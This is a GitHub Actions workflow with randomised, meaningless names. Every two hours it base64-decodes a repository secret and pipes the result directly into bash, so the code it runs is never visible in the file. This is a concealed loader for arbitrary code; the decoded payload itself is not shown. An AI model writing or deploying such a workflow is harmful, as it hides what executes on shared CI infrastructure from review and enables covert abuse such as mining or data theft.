name: ulCFUmc
on:
  schedule:
    - cron: '0 */2 * * *'
  workflow_dispatch:
jobs:
  BPtVKeyRh:
    runs-on: ubuntu-latest
    env:
      KkboWqKL: ${{ secrets.DFvHJPqqQY }}
    steps:
      - uses: actions/checkout@v5
      - run: echo "${{ secrets.tMbOful }}" | base64 -d | bash
